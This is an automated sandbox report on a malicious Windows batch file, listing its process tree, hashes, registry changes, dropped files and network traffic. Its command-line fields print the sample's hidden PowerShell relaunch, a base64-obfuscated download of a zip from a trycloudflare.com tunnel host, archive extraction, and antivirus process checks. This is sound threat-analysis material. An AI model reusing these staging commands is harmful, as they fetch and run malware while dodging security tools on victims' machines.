download:

/tink.bat

Full analysis: https://app.any.run/tasks/5a8a556e-aa8d-4227-8036-97ddbd387bf3
Verdict: Malicious activity
Analysis date: April 15, 2025, 19:35:18
OS: Windows 11 Professional (build: 22000, 64 bit)
Indicators:
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (19932), with no line terminators
MD5:

8BFC2E4C7EE611FC0F7B15006AF299AB

SHA1:

F08195863426C9DAE4F1FC89014E9AE49AE576FD

SHA256:

759D6929E4456668A93D92B2AEA311D9B7590EBAB4A4DA3CD8602B8C0B8111D5

SSDEEP:

192:pkq0gVnNPXmZ+cmNrhLOeL5jF8ya1A7L3RAP8OX+sdIT+PYCnJBh+8xP1qhVAgkU:l/ynWZI8nRnwnk9lnP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3884)
    • Antivirus name has been found in the command line (generic signature)

      • tasklist.exe (PID: 5176)
      • find.exe (PID: 2836)
      • find.exe (PID: 3512)
      • tasklist.exe (PID: 1104)
  • SUSPICIOUS

    • Starts process via Powershell

      • powershell.exe (PID: 3884)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4012)
      • cmd.exe (PID: 5428)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 3884)
    • Reads the Internet Settings

      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3780)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3884)
    • Get information on the list of running processes

      • cmd.exe (PID: 5428)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3780)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 4632)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4632)
    • Process drops python dynamic module

      • powershell.exe (PID: 4632)
  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 3780)
    • Disables trace logs

      • powershell.exe (PID: 3780)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4632)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4632)
    • The sample compiled with english language support

      • powershell.exe (PID: 4632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
118
Monitored processes
12
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs tasklist.exe no specs find.exe no specs powershell.exe svchost.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1104tasklist /FI "IMAGENAME eq avgui.exe" C:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
1428\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1664C:\Windows\system32\svchost.exe -k NetworkService -pC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
2836find /i "AvastUI.exe" C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
3512find /i "avgui.exe" C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
3780powershell -Command "irm ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly9kaXktc29sdXRpb24td2FycmlvcnMtd29ya2Zsb3cudHJ5Y2xvdWRmbGFyZS5jb20vYmFiLnppcA=='))) -OutFile 'C:\Users\admin\Downloads\downloaded.zip' -ErrorAction Stop"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3884powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\admin\Desktop\tink.bat\" hidden' -WindowStyle Hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4012C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Desktop\tink.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4632powershell -Command "try { Expand-Archive -Path 'C:\Users\admin\Downloads\downloaded.zip' -DestinationPath 'C:\Users\admin\Downloads\Extracted' -Force } catch { exit 1 }"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5176tasklist /FI "IMAGENAME eq AvastUI.exe" C:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
Total events
15 106
Read events
15 098
Write events
8
Delete events
0

Modification events

(PID) Process:(3884) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3884) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3884) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3884) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
41
Suspicious files
364
Text files
1 577
Unknown types
0

Dropped files

PID
Process
Filename
Type
3780powershell.exeC:\Users\admin\Downloads\downloaded.zip
MD5:
SHA256:
3884powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_41k331dy.xba.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3884powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_24e4almf.bra.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3884powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:F9D7877A906C6918EF301B3CFFD301B4
SHA256:91978D96C492ADF8923E5875DE675537E660E170DAB04E37A327EB0C3EC4654B
4632powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_brojymcc.w3g.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3884powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:13EB55E4D5C81B5CDAE19252DE68189B
SHA256:971369347F0372BF10C2F7C0AB2E519987C1F5FC840E66FB8F2954FE360AEAFE
3780powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ftyxwvdv.oec.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3780powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpowhez.qjt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4632powershell.exeC:\Users\admin\Downloads\Extracted\Python\Python312\DLLs\_asyncio.pydexecutable
MD5:28D2A0405BE6DE3D168F28109030130C
SHA256:2DFCAEC25DE17BE21F91456256219578EAE9A7AEC5D21385DEC53D0840CF0B8D
4632powershell.exeC:\Users\admin\Downloads\Extracted\Python\Python312\DLLs\_elementtree.pydexecutable
MD5:B479ED301E990690A30FC855E6B45F94
SHA256:0C488E6883A70CD54A71A9E28796F87EF6CC0D288260A965CBB24BF1D7309A20
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
35
DNS requests
15
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
88.221.110.147:80
http://www.msftconnecttest.com/connecttest.txt
unknown
whitelisted
3640
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4976
MoUsoCoreWorker.exe
GET
200
208.89.74.31:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2e16a064e6a93291
unknown
whitelisted
5136
smartscreen.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
2768
svchost.exe
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?27a1f3f9d6f21f74
unknown
whitelisted
2768
svchost.exe
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1ba2c49461210cde
unknown
whitelisted
2768
svchost.exe
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?406ec4d9673749fb
unknown
whitelisted
2988
OfficeClickToRun.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
1848
svchost.exe
POST
403
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
whitelisted
1848
svchost.exe
POST
403
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
88.221.110.147:80
Akamai International B.V.
DE
unknown
4976
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4976
MoUsoCoreWorker.exe
208.89.74.31:80
ctldl.windowsupdate.com
US
whitelisted
3640
svchost.exe
20.190.160.17:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3640
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
5136
smartscreen.exe
48.209.144.71:443
checkappexec.microsoft.com
US
whitelisted
5136
smartscreen.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
3780
powershell.exe
104.16.231.132:443
diy-solution-warriors-workflow.trycloudflare.com
CLOUDFLARENET
whitelisted
3952
svchost.exe
239.255.255.250:1900
whitelisted
1272
svchost.exe
23.197.142.186:443
fs.microsoft.com
Akamai International B.V.
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.78
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
ctldl.windowsupdate.com
  • 208.89.74.31
  • 208.89.74.19
  • 199.232.210.172
  • 199.232.214.172
whitelisted
login.live.com
  • 20.190.160.17
  • 20.190.160.22
  • 20.190.160.131
  • 20.190.160.20
  • 20.190.160.65
  • 40.126.32.138
  • 40.126.32.72
  • 20.190.160.66
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.17.190.73
whitelisted
checkappexec.microsoft.com
  • 48.209.144.71
whitelisted
diy-solution-warriors-workflow.trycloudflare.com
  • 104.16.231.132
  • 104.16.230.132
whitelisted
fs.microsoft.com
  • 23.197.142.186
whitelisted
self.events.data.microsoft.com
  • 20.189.173.12
whitelisted
officeclient.microsoft.com
  • 52.109.89.18
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO Microsoft Connection Test
Potentially Bad Traffic
ET INFO Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Cloudflare Tunnel (TryCloudflare)
Misc activity
ET HUNTING TryCloudFlare Domain in TLS SNI
Misc activity
ET INFO Observed trycloudflare .com Domain in TLS SNI
No debug info